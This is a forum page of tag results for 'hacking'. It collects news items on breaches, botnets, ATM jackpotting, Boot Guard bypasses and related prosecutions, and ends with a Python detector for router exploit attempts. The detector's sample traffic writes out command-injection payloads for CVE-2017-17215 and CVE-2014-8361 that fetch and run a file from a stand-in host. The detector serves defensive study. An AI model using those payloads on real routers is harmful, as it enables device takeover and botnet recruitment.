Showing results for tags 'hacking'.
Found 73 results

  1. With just a year to go before the 2020 Census, the U.S. government is urgently working to safeguard against hacking and disinformation campaigns as it perfects a plan to count about 330 million people largely online for the first time. Going digital is intended to cut costs. But cybersecurity experts say it may also put the survey at unprecedented risk in a nation embroiled in fallout from Russian interference in the 2016 election. Any outside attempt to discredit or manipulate the decennial survey could drive down response rates, imperiling the integrity of data that help determine a decade's worth of federal funding, congressional apportionment and redistricting throughout the country. "Just as with voting, completing the census is a powerful exercise in our democracy, and there are always people who want to prevent others from exercising their power," said Indivar Dutta-Gupta, co-executive director of the Georgetown Center on Poverty and Inequality and an expert on the census. "I think there will be lots of attempts. We should be concerned." So far, there has been no indication of anyone trying to target the survey, but experts say the risks will probably grow as the launch draws closer. Census Bureau officials say they are working with experts in the government and private sector, including at the Department of Homeland Security, Facebook, Microsoft and Google, to defend against people or foreign states who try to undermine the U.S. government or prevent certain groups from being counted. They plan to encrypt incoming information, scan responses for unusual activity and monitor social media to spot attempts to mislead the public. The bureau has bought up more than 100 census-related domain names so they can't be used to create fake census sites, and it plans to aggressively push the message that completing the survey is safe and that being counted is beneficial to communities. Yet cybersecurity experts cite several reasons to be concerned with the plan. 
It comes at a time when trust in the government generally is low. Many people's trust in the census in particular has been eroded by fears about the Trump administration's decision last year to add a citizenship question to the survey. The question has been struck down by two federal courts and the Supreme Court is expected to decide this spring whether it will appear on the forms. At the same time, previous data breaches have left many Americans leery of sharing personal information online. The federal government’s troubled track record in building and maintaining technological systems includes the repeated meltdowns of healthcare.gov in 2013 and the Office of Personnel Management hack, revealed in 2015, that exposed names, Social Security numbers, salaries and other information on more than 21 million federal workers, allegedly to Chinese hackers. More recently, the Federal Emergency Management Agency exposed the personal addresses and banking information of 2.5 million disaster survivors. Joshua Geltzer, a former National Security Council official who has warned of security risks to the census and called for greater transparency on it, said it is particularly important to clarify how it will be protected given how Russian interference in the last presidential election spawned years of questions - many still unanswered - about how seriously outside forces were able to affect a major American vote. "We know that actors like the Russians and others are interested in finding ways to make our democracy seem weak, brittled, flawed," said Geltzer, who is executive director of Georgetown Law's Institute for Constitutional Advocacy and Protection. He added, "I don't think it's crazy to worry that there might still be problems when this thing rolls around. We haven't cracked the code on this in terms of other contexts, of the elections, of the general democracy, so I wouldn't expect the Census Bureau to have figured this out." 
Disrupting a census is not unprecedented: When Australia put its census online in 2016, cyberattackers launched what experts call a Distributed Denial of Service attack, in which hackers intentionally overload online systems. The onslaught crashed a critical website, slowing the count. In past U.S. censuses, survey forms arrived in people's mailboxes, and those who didn't mail them in received visits from enumerators carrying another set of paper forms. This time, most households will receive an initial mailing inviting them to log on to the bureau's website (paper forms will be mailed at that point to the 20 percent least likely to be online, including older people and those in areas with low Internet connectivity). Households that don't respond electronically will then receive paper forms by mail, and when enumerators knock on doors to follow up with those who still haven't responded, they will intake respondents' information electronically, via an iPhone 8. The decennial census does not gather Social Security numbers or financial information. "Most people fill out credit card applications with much more personal information," said the bureau's assistant director of communications, Stephen Buckner. The bureau has systems in place to guard against hacks. After encrypting the data at two points in the process, it will store the data in its own secure cloud environment through Amazon Web Services' GovCloud. (Amazon Chief Executive Jeff Bezos owns The Washington Post.) It will continuously monitor incoming data, using an automated system that will look for suspicious activity, check information against existing records, and refer questionable surveys to analysts for follow-up. In the event of a website slowdown or crash, there will be a backup system as well as options to complete the survey via telephone or mail.
Indications of hacks might include unusual patterns of activity, such as a single-family home reporting that it has 30 residents, or responses coming in too rapidly for a survey that should take about 10 minutes to fill out online. "If the Census Bureau sees a response is being generated every 15 seconds from a certain computer or a certain area," that would raise suspicions, said Maria Filippelli, public interest technology census fellow with New America, a nonpartisan Washington think tank. Any unusual spikes "would be investigated, isolated and shut down." But the system for collecting information has built-in vulnerabilities, some security experts say. For example, there is no way to stop a person from uploading information about a particular address even if he or she is not a resident there. (While the mailings will include an ID number, respondents can fill out the survey without using the number.) Census Bureau officials say such activity will be detected as incoming responses are automatically checked against existing records; if a discrepancy is spotted, it will be flagged for human review. "We constantly scan it to see if some new vulnerability occurred, and if it occurred, then we fix it," said Kevin Smith, the bureau's chief information officer. "We are absolutely performance-testing it above and beyond the level that we need to." The bureau has been working with DHS's Cybersecurity and Infrastructure Security Agency (CISA), where a team of about 20 people is focused on helping secure the system and gaming out possible hacks. "The two most important things that I've got going on in both prepping and executing next year are the election and the census," an official there said. "The risk to the census is fairly broad, and they're well aware of this, they're taking a lot of really good actions to secure against these. 
But then you could have anything from an individual hacker trying to get into some aspect of it to just be difficult, to nation-states trying to gain access in order to get access to personally identifiable information to potentially change census collection, and then you've got the foreign influence piece as well, sowing confusion and discord. The census is a key tenet of our democracy, and so some of the same risks and threats you saw to elections are applicable to census." A research company that surveys the Web for signs of malfeasance said it detected some chatter about the census a couple of years ago, but so far has seen no evidence of a concerted campaign. That is not surprising given the survey is a year off. A more coordinated effort might not come together until later in the process, said a researcher at the company, which asked for anonymity because of the private nature of its work. But even if census data aren't hacked, concerns over cybersecurity could create an atmosphere ripe for disinformation campaigns seeking to influence how, or whether, respondents fill out the survey. This could come in the form of fake reports of Immigration and Customs Enforcement officials accompanying census enumerators to people's homes, fake news stories about census data being hacked, or phishing websites that trick people into thinking they have filled out the real survey. Any of this could lower response rates, jeopardizing the quality of the data and driving up costs as the agency attempts to collect information for nonresponding households by going door to door and combing government and public records. The bureau must navigate a delicate balance between warning people about these dangers and scaring them off. "It's tough, for those who care about the census," Dutta-Gupta said. "We have to be careful in not raising false alarms or concerning people more than they need to be, since trust is essential in ensuring a fair and accurate count." 
The bureau has been meeting with companies such as Microsoft, Google, Facebook and Twitter to plan how to identify and stop misinformation as it comes online. In March, Facebook hosted an event with the bureau and other technology companies and civic organizations to talk about the census. "They're opening their doors, they realize the importance of this, they're being collaborative," Buckner said. Last year Facebook and Twitter adopted clear, specific prohibitions around voter suppression, hoping to stop the spread of posts, videos and other content designed to deceive users about how to vote. Representatives from these companies would not say whether they are planning something similar for the census. Facebook said only that census-related posts could be submitted to its third-party fact-checkers for review, while Twitter said it would take action against inauthentic accounts created with the intention to deceive users about the census. Google declined to discuss the census, and Microsoft said it is working with the bureau on cybersecurity but did not provide details. Educating the public about how the census works and what information to believe is a key part of protecting it, the CISA official said. "We need to ensure that the public understands where the information is coming from," the official said. "An informed public is our best defense." The U.S. Government Accountability Office has put the 2020 count on its high-risk list, and in a report last month it cited more than 1,000 system security weaknesses and warned that the bureau needs to address them "before systems are deployed."
At a full dress rehearsal for the count last year (which was scaled down from three locations to one because of funding shortages), "the Bureau did not test all 2020 Census systems and IT capabilities," the report said, adding that incomplete testing "increases the risk that innovations and IT systems will not function as intended." The bureau said it meets regularly with the GAO to address its recommendations, but added that not all the systems needed to be tested during the dress rehearsal, as some were up and running for other census surveys, and it was too early to test others. Nick Marinos, director of IT and cybersecurity issues at the GAO, said although the bureau's innovations make sense, it is coming up against a hard deadline to make sure its systems run smoothly. "This is an unprecedented effort. . . . Globally, there haven't been too many online censuses performed," he said. "I think the bureau itself is anxious and I think that is warranted. I think we are also holding our breath, waiting to see what the next six months brings." Source
  2. Equifax revealed its earnings release related to the security breach suffered in 2017; the incident has cost about $1.4 billion plus legal fees.
Equifax revealed this week its earnings release related to the security breach suffered by the credit bureau back in 2017; the incident has cost about $1.4 billion plus legal fees. In 2017 Equifax confirmed it had suffered a massive data breach: cyber criminals stole sensitive personal records of 145 million US citizens and hundreds of thousands of people in Canada and the UK. Attackers exploited the CVE-2017-5638 Apache Struts vulnerability. The vulnerability affects the Jakarta Multipart parser upload function in Apache and could be exploited by an attacker to make a maliciously crafted request to an Apache web server. The vulnerability was fixed back in March 2017, but the company did not update its systems, a claim that was also reported by an Apache spokeswoman to the Reuters agency. Compromised records included names, social security numbers, birth dates, home addresses, credit-score dispute forms, and, for some users, also credit card numbers and driver's license numbers. In March 2018, experts argued the Equifax hack was worse than previously thought: according to documents provided by Equifax to the US Senate Banking Committee, the attackers also stole taxpayer identification numbers, phone numbers, email addresses, and credit card expiry dates belonging to some Equifax customers. A few weeks later the results of the forensic investigation revealed that an additional 2.4 million identities were involved in the security incident. Chief Executive Mark Begor confirmed that Equifax recently reached settlement agreements with some of the class action lawsuits and government investigators. “This is a positive step forward for Equifax, as we work to put the 2017 cybersecurity event behind us,” he explained.
According to Begor, the settlement terms include the creation of a single “consumer redress fund” to respond to and consolidate redress requests. “There are still many other lawsuits outstanding,” reported the website Wabe.org. “The company has said hundreds of suits were filed against it since the breach, including more than 2,500 individual consumer plaintiffs, international and domestic class action suits, shareholder litigation and government lawsuits from states and cities.” In June 2018, Equifax agreed to the Consent Order from some state banking regulators, but many governmental agencies and officials are still investigating the breach. “The company said earlier this year that the Consumer Financial Protection Bureau and Federal Trade Commission had told Equifax the agencies do “intend to seek injunctive relief damages and, with respect to the CFPB, civil money penalties against us based on allegations related to the 2017 cybersecurity incident,”” continues the Wabe site. Experts believe that Equifax must be punished with exemplary penalties that incentivize the credit bureaus to protect consumer data. “Equifax still hasn’t paid a price two years after losing the financial DNA of 150 million Americans,” said Mike Lit, a national campaign director at the consumer advocacy group U.S. Public Interest Research Group. “That’s why we need strong oversight and meaningful financial penalties to incentivize the credit bureaus to protect our data.” Source
  3. Cybercrime comes to school lunches
School lunches exec faces felony charges related to the hacking of his rival’s network to expose weak security
Every form of crime seems to invade the world of cybersecurity. Sooner or later that had to include the age-old childhood bullying trauma of school lunch theft. Except in this case the pilfered prize was data, not baloney. Keith Wesley Cosbey, CFO of California school lunch provider Choicelunch, was arrested in April on two felony counts — identity theft and unlawful computer access. The San Francisco Chronicle reports that law enforcement accuses Cosbey of hacking into the network of longtime Choicelunch rival The LunchMaster, accessing sensitive student data including names, grades, meal preferences, and allergy info. The charges contend that Cosbey, claiming to be an anonymous tipster, then sent the stolen data to the California Department of Education in an attempt to discredit The LunchMaster by exposing weak security and complaining the company does not do enough to protect student data. When the Department of Education confronted The LunchMaster about the breach, the company launched an internal investigation. The LunchMaster cybersecurity team was able to trace the breach back to an IP address in Danville, Calif., where Choicelunch is based. The LunchMaster contacted the FBI in April 2018, and after a yearlong investigation, Cosbey was arrested. Cosbey is currently out on $125,000 bond and is due in court later this month. If convicted, he faces over three years in prison. This week, investigators allowed LunchMaster to notify families affected by the breach, which the company has been doing, The Chronicle reported. Source
  4. By replacing a PC's SPI flash chip with one that contains rogue code, an attacker can gain full, persistent access.
Researchers have found a new way to defeat the boot verification process for some Intel-based systems, but the technique can also impact other platforms and can be used to compromise machines in a stealthy and persistent way. Researchers Peter Bosch and Trammell Hudson presented a time-of-check, time-of-use (TOCTOU) attack against the Boot Guard feature of Intel's reference Unified Extensible Firmware Interface (UEFI) implementation at the Hack in the Box conference in Amsterdam this week. Boot Guard is a technology that was added in Intel Core 4th generation microarchitecture -- also known as Haswell -- and is meant to provide assurance that the low-level firmware (UEFI) has not been maliciously modified. It does this by checking that the loaded firmware modules are digitally signed with trusted keys that belong to Intel or the PC manufacturer every time the computer starts. Bosch, an independent researcher and computer science student at Leiden University in the Netherlands, discovered an anomaly in the Boot Guard verification process while he was trying to find a way to use the open-source Coreboot firmware on his own laptop. In particular, he noticed that after the system verified the firmware and created a validated copy in cache, it later re-read modules from the original copy located in the Serial Peripheral Interface (SPI) memory chip -- the chip that stores the UEFI code. This isn't correct behavior, because the system should only rely on the verified copy after the cryptographic checks are passed. This made Bosch think there might be an opportunity for an attacker to modify the firmware code after it's been verified and before it's incorrectly re-read from SPI memory.
He took his findings and an early proof-of-concept implementation to Trammell Hudson, a well-known hardware and firmware researcher whose previous work includes the Thunderstrike attacks against Apple's Thunderbolt technology. Hudson confirmed Bosch's findings, and together they worked on an attack that involves attaching a programming device to the flash memory chip to respond with malicious code when the CPU attempts to reread firmware modules from SPI memory instead of the validated copy. The result is that malicious and unsigned code is executed successfully, something that Boot Guard was designed to prevent. While the attack requires opening the laptop case to attach clip-on connectors to the chip, there are ways to make it permanent, such as replacing the SPI chip with a rogue one that emulates the UEFI and also serves malicious code. In fact, Hudson has already designed such an emulator chip that has the same dimensions as a real SPI flash chip and could easily pass as one upon visual inspection if some plastic coating is added to it. What are the implications of such TOCTOU attacks? The Intel Boot Guard and Secure Boot features were created to prevent attackers from injecting malware into the UEFI or other components loaded during the booting process such as the OS bootloader or the kernel. Such malware programs have existed for a long time and are called boot rootkits, or bootkits, and attackers have used them because they are very persistent and hard to remove. That's because they re-infect the operating system after every reboot before any antivirus program has a chance to start and detect them. In its chip-swapping variant, Hudson's and Bosch's attack acts like a persistent hardware-based bootkit. It can be used to steal disk encryption passwords and other sensitive information from the system and it's very hard to detect without opening the device and closely inspecting its motherboard.
Even though such physical attacks require a targeted approach and will never be a widespread threat, they can pose a serious risk to businesses and users who have access to valuable information. Such a physical compromise could occur in different ways, for example in an Evil-Maid-type scenario where a high-value target, like a company's CEO, travels to a foreign country and leaves their laptop unattended in their hotel room. Bosch tells CSO that replacing the SPI memory chip with a rogue one designed to execute this attack would take 15 to 20 minutes for an experienced attacker with the right equipment. Another possibility is supply chain attacks or the so-called "interdiction" techniques where computer shipments are intercepted in transit, for example by an intelligence agency, are backdoored and then resealed to hide any tampering. The documents leaked by Edward Snowden showed that the NSA uses such techniques, and it is likely not the only intelligence agency to do so. Some devices do have tamper-evident seals or mechanisms, but someone with the right resources and knowledge can easily bypass those defenses, Bosch tells CSO. Malicious employees could also use this technique on their work-issued laptops to either bypass access controls and gain administrator privileges or to maintain access to the company's data and network after they leave the company. Such a compromise would survive the computer being wiped and being put back into use. There have been several cases over the years of economic espionage where employees working for various companies were caught stealing trade secrets and passing them to foreign governments or to competitors. What is the mitigation? The two researchers notified Intel of their findings in January and tell CSO that the chipmaker treated the issue seriously and assigned a high severity to it.
The company already has patches available for its reference UEFI implementation -- known as Tianocore -- that it shares with BIOS vendors and PC manufacturers. The researchers haven't yet tested the fixes, but at least based on the description they seem comprehensive and should prevent similar attacks in the future. The problem is that distributing UEFI patches has never been an easy process. Intel shares its UEFI kit with UEFI/BIOS vendors who have contracts with various PC manufacturers. Those OEMs then make their own firmware customizations before they ship it inside their products. This means that any subsequent fixes require collaboration and coordination from all involved parties, not to mention end users who need to actually care enough to install those UEFI updates. The patches for the critical Meltdown and Spectre vulnerabilities that affected Intel CPUs also required UEFI updates and it took months for some PC vendors to release them for their affected products. Many models never received the patches in the form of UEFI updates because their manufacturers no longer supported them. The two researchers plan to release their proof-of-concept code in the following months as part of a tool called SPISpy that they hope will help other researchers and interested parties to check if their own machines are vulnerable and to investigate similar issues on other platforms. "I would really like to see the industry move towards opening the source to their firmware, to make it more easy to verify its correctness and security," says Bosch. Source
  5. The accounts of Eamonn Holmes and Louis Theroux were among those hacked
An online hacking security agency has “hijacked” multiple Twitter accounts in an effort to make a point regarding online security issues. On Thursday, the message: “This account has been temporarily hijacked by Insinia Security,” appeared on the Twitter accounts of a “number of celebrities” including Eamonn Holmes and Louis Theroux. The tweet also appeared on the Twitter feed of The Independent's travel correspondent Simon Calder. According to a post on Medium by Insinia Security, which explains the hijacking, it was done to highlight the security dangers of having a phone number associated with a Twitter account. Mike Godfrey, the CEO of Insinia Security, confirmed to The Independent the reason behind the hacking, explaining: “Insinia have warned for years that using text messaging for authentication, interaction or security is totally unacceptable and leaves people vulnerable to attack. “This issue was highlighted to Twitter in 2007, again in 2009, again in 2011 and almost every year since. Quite simply; Twitter doesn’t listen. The campaign today was to highlight these vulnerabilities, how serious they can be and how someone with a relatively low skill set and a range of tools can control social media that people use to control their brands, career, image and much more. People have a right to know the truth about the state of insecurity that huge companies like Twitter leave innocent users in.” And, according to Godfrey, hijacking the accounts was easy - “In this case, it was a simple task of ‘spoofing’ the Twitter users’ MSISDN (mobile phone number) and sending texts that appeared to be from their phone to Twitter, which will automatically accept commands provided it believes that the text has come from the user’s phone number, which it did,” he told us.
While Godfrey would not disclose “how these numbers were obtained,” he did say the entire attack “took less than 10 minutes to carry out and complete.” On Medium, the depth of the hijacking was further explained - and the dangers this lack of security poses. “We used this method to successfully control the target’s Twitter account, allowing us to send DMs, retweet and like tweets, follow and unfollow people and much more,” the post reads. According to Insinia Security, this flaw in security could lead to potential risks such as the spread of offensive or extremist material and the spread of fake news. To protect oneself, Godfrey told us the best way is to use a “separate number for TFA (two-factor authentication) on Twitter.” “People must understand that even someone having your phone number puts you at risk,” he continued. “We shouldn’t be so relaxed with who we give our numbers to and Twitter certainly shouldn’t be allowing people to tweet and control accounts by sending texts with no authentication.” Source
  6. When a government body creates a self-service payment system for paying for everything from utility bills to permits and fines, you would expect convenience to be tied to adequate security for financial data. Not necessarily so in the case of Click2Gov, a payment portal system used by many US cities, both small and large. Click2Gov was developed by Central Square, formerly known as Superion, and it was rumored last year that the local government portal service may have been subject to a data breach. In September this year, cybersecurity firm FireEye confirmed that a security incident had taken place, in which threat actors had planted never-before-seen malware to scrape payment card details from US citizens. It was suggested that the new malware strains, Firealarm and Spotlight, were able to parse logs for payment card data and extract payment details. Security research firm Gemini Advisory has now released a report examining the after-effects of the attack, in which it is believed 294,929 payment records have been compromised across at least 46 cities in the US, as well as one in Canada. The findings suggest that less than 50 percent of cities which have lost customer data either know of or have publicly disclosed data breaches occurring at their sites. On Tuesday, the company said that by selling this information on the Dark Web, the threat actors have earned themselves at least $1.7 million. In the meantime, Central Square is still trying to work out how the attacks took place -- and potentially portals are still at risk. The company did deploy a patch in June to resolve the original vulnerabilities the hackers used to infiltrate Click2Gov, but told Gemini Advisory that "the system remains vulnerable for an unknown reason." However, the firm added that the affected systems were all locally hosted, while the cloud-based Click2Gov software was not affected. It seems, then, that local systems have security issues which are yet to be addressed.
Saint Petersburg, Florida, Bakersfield, California, and Ames, Iowa, have all reported utility payment portal data breaches in the last three months. Payment data from these portals have been found for sale in the web's underbelly. "In our analysis of all 20 reported instances of the Click2Gov breaches, we have definitively confirmed that, in total, at least 111,860 payment cards were compromised," Gemini Advisory says. "Also, in each instance, the stolen payment cards were uploaded for sale either during the breach or immediately after the breach was identified and reported, with the average price of $10 per card." Two hackers have been tracked through their wares, and the cybersecurity firm believes both are likely part of the criminal ring which conducted the widespread attacks. Gemini Advisory's Director of Research, Stas Alforov, told Fortune that Click2Gov is working with local authorities to resolve the security issues which still exist, and that the data theft is due in part to "a lack of sophistication on the part of municipal IT workers." Source
  7. An Australian teenager has pled guilty to hacking Apple’s system multiple times in a span of several months, but will not be going to jail. He said he did it because he’s just a huge Apple fanboy. Melbourne news outlet the Age reported that Apple had alerted the FBI after the company detected a breach. Then authorities notified the Australian Federal Police, which raided the teen’s home. There agents found 90Gb of sensitive files in a folder titled “hacky hack hack.” A magistrate told the court that the teen (not named for legal reasons) exploited a VPN intended for remote connection, according to Bloomberg. Apple reportedly blocked his access in November 2016, but he regained access last year. Apple did not immediately respond to a Gizmodo request for comment, but in a statement to Bloomberg Apple said that customers’ personal data was not compromised. The teen’s lawyer said at the boy’s appearance at Children’s Court in August that he hacked Apple “because he was such a fan” of the company, according to the Age. Bloomberg reports the teen told police that he breached Apple’s systems, in part, because he enjoyed “just being in the corporation pretending you were employees,” and the activity was apparently addictive. According to Bloomberg, the magistrate told the court that the teenager had shown remorse and had cooperated with law enforcement, and would only be given an eight-month probation instead of jail time. “Your offending is serious,” the magistrate said to the teen, according to Bloomberg. “It was sustained, sophisticated, and a successful attack on the security of a major multinational corporation.” The teen was 16 when he first accessed Apple’s system. According to the Age, he is now 19 and has been accepted at a university where he plans on studying criminology and cyber security. Source
  8. A Romanian woman, Eveline Cismaru, 28, pleaded guilty to federal charges for illegally gaining access to more than 126 computers connected to surveillance cameras installed and used by the Metropolitan Police Department (MPD) and infecting them with ransomware. She pleaded guilty before the Honorable Dabney L. Friedrich to one count of conspiracy to commit wire fraud and one count of conspiracy to commit computer fraud, which carry statutory maximums of 20 years and five years in prison. Cismaru agreed to cooperate fully in the investigation and is to be sentenced on Dec. 3, 2018. Investigators arrested Cismaru, 28, and a co-defendant, Mihai Alexandru Isvanca, 25, in Romania. Cismaru was extradited to the United States on July 26, 2018, and Isvanca is pending extradition to the United States. “According to the government’s evidence, beginning in early January 2017, and continuing through Jan. 12, 2017, a computer hacking attack on the MPD computer network disabled two-thirds of the outdoor surveillance cameras operated by MPD in the District of Columbia, just days before the 2017 Presidential Inauguration,” reads the Department of Justice press release. Investigators also found that the conspirators were in the process of attacking as many as 179,616 other computers using stolen e-mails, e-mail passwords, and banking credentials. The ransomware attack took place in 2017, just before the day of the Presidential Inauguration, and due to the rapid response by investigators and MPD’s Chief Technology Office, the overall security of the 2017 Inauguration was not impacted by this event. Source
  9. The internet and technology have become a way of life for us all. From cars to homes, we depend on technology. While it serves as a relief to us, there are always drawbacks to it. In the case of the internet, the risks involve hacking. In the past few months, we have seen cryptocurrency hacks, data hacks, bank hacks, phone hacks, social media hacks and whatnot. Keeping that in mind, researchers have invented a black box chip that makes it difficult for hackers to hack into a system. There was a need to come up with a working solution to prevent hacking, and this black box seems to be the answer to it. What Is The Black Box Chip? It’s a memory chip that makes the entire system complex so that hackers can’t clone the system. A circuit that is made up of black box chips (memory resistors) makes it hard to predict the voltage outputs of a system. This makes it nearly impossible to clone a system or create nodes in a network to attack it. Hence, this chip can help prevent hacking. Who Invented It? An electrical and computer engineering professor at the University of California, Dmitri Strukov, is working on this technology and it will soon be available commercially to prevent hacking. The Bottom Line While the technology is still in its testing stage, there finally seems to be hope of preventing hacking in the future. < Here >
  10. Is it allowed under the site terms and conditions to talk about learning and preventing hacking?
  11. ATM makers warn of 'jackpotting' hacks on U.S. machines (Reuters) - Diebold Nixdorf Inc and NCR Corp, two of the world’s largest ATM makers, have warned that cyber criminals are targeting U.S. cash machines with tools that force them to spit out cash in hacking schemes known as “jackpotting.” The two ATM makers did not identify any victims or say how much money had been lost. Jackpotting has been rising worldwide in recent years, though it is unclear how much cash has been stolen because victims and police often do not disclose details. The attacks were reported earlier on Saturday by the security news website Krebs on Security, which said they had begun last year in Mexico. The companies confirmed to Reuters on Saturday they had sent out the alerts to clients. NCR said in a Friday alert that the cases were the first confirmed “jackpotting” losses in the United States. It said its equipment had not been targeted in the recent attacks, but that it was still a concern for the entire ATM industry. “This should be treated by all ATM deployers as a call to action to take appropriate steps to protect their ATMs against these forms of attack,” the alert said. Diebold Nixdorf said in a separate Friday alert that U.S. authorities had warned the company that hackers were targeting one of its ATM models, known as Opteva, which went out of production several years ago. A confidential U.S. Secret Service alert sent to banks said the hackers targeted stand-alone ATMs typically located in pharmacies, big box retailers and drive-thru ATMs, Krebs on Security reported. Diebold Nixdorf’s alert described steps that criminals had used to compromise ATMs. They include gaining physical access, replacing the hard drive and using an industrial endoscope to depress an internal button required to reset the device. Reuters was unable to obtain a copy of the Secret Service report and an agency representative declined comment. 
Officials with the Federal Bureau of Investigation could not immediately be reached. Russian cyber security firm Group IB has reported that cyber criminals remotely attacked cash machines in more than a dozen countries across Europe in 2016. Similar attacks were also reported that year in Thailand and Taiwan. Source
  12. JenX Botnet Has Grand Theft Auto Hook Researchers at Radware have discovered a new botnet that uses vulnerabilities linked with the Satori botnet and is leveraging the Grand Theft Auto videogame community to infect IoT devices. Satori is a derivative of Mirai, the notorious botnet that in 2016 infamously managed to take down Dyn, a DNS hosting provider that supports some of the world’s largest websites. The vulnerabilities in question are CVE-2014-8361 and CVE-2017-17215, which affect certain Huawei and Realtek routers, Radware researcher Pascal Geenens said in a blog post. Radware’s inquiry into the botnet led it to a command-and-control server hosted at the site San Calvicie, which offers not only multiplayer mod support for Grand Theft Auto: San Andreas, but also DDoS attacks for a fee. Enthusiasts of the venerable videogame series, which places players in an immersive 3-D world of violence and vicarious thrills, have created an extensive universe of add-on features and tweaks, or “mods,” in the name of enriching and extending their experience. Sites such as San Calvicie cater to GTA gamers who want to host their own custom versions of GTA for multiplayer action. “The Corriente Divina (‘divine stream’) option is described as ‘God’s wrath will be employed against the IP that you provide us,” Geenens wrote of the site’s DDoS offering. “It provides a DDoS service with a guaranteed bandwidth of 90-100 Gbps and attack vectors including Valve Source Engine Query and 32 bytes floods, TS3 scripts and a ‘Down OVH’ option which most probably refers to attacks targeting the hosting service of OVH, a cloud hosting provider that also was a victim of the original Mirai attacks back in September 2016. OVH is well known for hosting multi-player gaming servers such as Minecraft, which was the target of the Mirai attacks at the time.” Shortly after Geenens made his initial discovery, he returned to the site and found that the terms of engagement had changed. 
Now the listing included a reference to “bots,” and offered a DDoS volume of between 290 and 300 Gbps, for the same low price of $20 a pop. While derived from established code, the San Calvicie-hosted botnet, which Geenens has dubbed “JenX”, is deployed in a different manner than its predecessors. “Untypical for IoT botnets we have witnessed in the past year, this botnet uses servers to perform the scanning and the exploits,” he wrote. “Nearly all botnets, including Mirai, Hajime, Persirai, Reaper, Satori and Masuta perform distributed scanning and exploiting. That is, each victim that is infected with the malware will perform its own search for new victims. This distributed scanning provides for an exponential growth of the botnet, but comes at the price of flexibility and sophistication of the malware itself.” The centralized approach employed by JenX trades slower growth for lower detection, he added. The danger from JenX should be mostly confined to GTA San Andreas users, Geenens said, but with a stern caveat. “[T]here is nothing that stops one from using the cheap $20 per target service to perform 290 Gbps attacks on business targets and even government related targets,” he wrote. “I cannot believe the San Calvicie group would oppose it.” Radware filed abuse notifications related to JenX, resulting in a partial takedown of the botnet’s server footprint, but it remains active. JenX’s implementation makes taking it down a tricky task. “As they opted for a central scan and exploit paradigm, the hackers can easily move their exploit operations to bulletproof hosting providers who provide anonymous VPS and dedicated servers from offshore zones,” he wrote. “These providers do not care about abuse. Some are even providing hosting services from the Darknet. If the exploit servers were moved to the Darknet, it would make it much more difficult to track down the servers’ location and take them down.” SOURCE
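The post above makes two points a defender can act on: the exploit requests for CVE-2014-8361 and CVE-2017-17215 have a recognisable shape, and a centrally scanned botnet shows up as a few source addresses carrying all of the attempts. The following is an added example, not code from Radware or the article, that checks both over constructed HTTP requests. The request patterns (the Huawei DeviceUpgrade path and NewStatusURL element on TCP 37215, the Realtek AddPortMapping SOAP action and NewInternalClient element on TCP 52869) are taken from public write-ups and are assumptions here; the sample traffic and addresses are invented.

```python
import ipaddress
import re
from collections import Counter, defaultdict

# Constructed sample traffic for this example (not captured data). Each tuple is
# (source_ip, destination_port, method, path, headers, body). 203.0.113.10 plays
# the role of a central scan-and-exploit server hitting several routers.
SAMPLE_REQUESTS = [
    # CVE-2017-17215 pattern (assumed from public write-ups): Huawei HG532 UPnP
    # DeviceUpgrade on TCP 37215 with shell substitution inside NewStatusURL.
    ("203.0.113.10", 37215, "POST", "/ctrlt/DeviceUpgrade_1",
     {"SOAPAction": "urn:schemas-upnp-org:service:WANPPPConnection:1#Upgrade"},
     "<NewStatusURL>$(/bin/busybox wget -g 198.51.100.5 -l /tmp/x -r /x;sh /tmp/x)</NewStatusURL>"),
    ("203.0.113.10", 37215, "POST", "/ctrlt/DeviceUpgrade_1",
     {"SOAPAction": "urn:schemas-upnp-org:service:WANPPPConnection:1#Upgrade"},
     "<NewStatusURL>$(/bin/busybox wget -g 198.51.100.5 -l /tmp/x -r /x;sh /tmp/x)</NewStatusURL>"),
    # CVE-2014-8361 pattern (assumed): Realtek miniigd AddPortMapping on TCP 52869
    # where NewInternalClient carries a command instead of a LAN address.
    ("203.0.113.10", 52869, "POST", "/picsdesc.xml",
     {"SOAPAction": "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"},
     "<NewInternalClient>`cd /tmp;wget http://198.51.100.5/x;sh x`</NewInternalClient>"),
    # Benign: a LAN host asking its router for a port mapping.
    ("192.168.1.20", 52869, "POST", "/picsdesc.xml",
     {"SOAPAction": "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"},
     "<NewInternalClient>192.168.1.20</NewInternalClient>"),
    # Benign: ordinary web traffic.
    ("192.168.1.21", 80, "GET", "/index.html", {}, ""),
]

# Shell metacharacters that have no business inside a UPnP argument.
SHELL_META = re.compile(r"\$\(|`|;|\|\||&&|\|")


def _tag(body, name):
    """Return the text of the first <name>...</name> element in body, or None."""
    m = re.search(rf"<{name}>(.*?)</{name}>", body, re.S)
    return m.group(1) if m else None


def classify(req):
    """Return the CVE whose exploit pattern the request matches, else None."""
    src, port, method, path, headers, body = req
    if method != "POST":
        return None
    if path == "/ctrlt/DeviceUpgrade_1":
        url = _tag(body, "NewStatusURL")
        if url is not None and SHELL_META.search(url):
            return "CVE-2017-17215"
    if "#AddPortMapping" in headers.get("SOAPAction", ""):
        client = _tag(body, "NewInternalClient")
        if client is not None:
            try:
                ipaddress.ip_address(client.strip())
            except ValueError:
                # NewInternalClient must be an address; anything else is injection.
                return "CVE-2014-8361"
    return None


def summarize(requests):
    """Per source IP, count exploit attempts by CVE. A handful of sources carrying
    all attempts is the signature of centralised scanning; victim-driven scanning
    would spread the same attempts over many source addresses."""
    per_source = defaultdict(Counter)
    for req in requests:
        cve = classify(req)
        if cve:
            per_source[req[0]][cve] += 1
    return {src: dict(c) for src, c in per_source.items()}


if __name__ == "__main__":
    for src, hits in summarize(SAMPLE_REQUESTS).items():
        print(src, hits)
```

Feeding real proxy or IDS logs through `summarize` gives the per-source view Geenens describes: JenX-style infrastructure yields a short list of servers with many hits each, which is also the list to send abuse notifications about.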
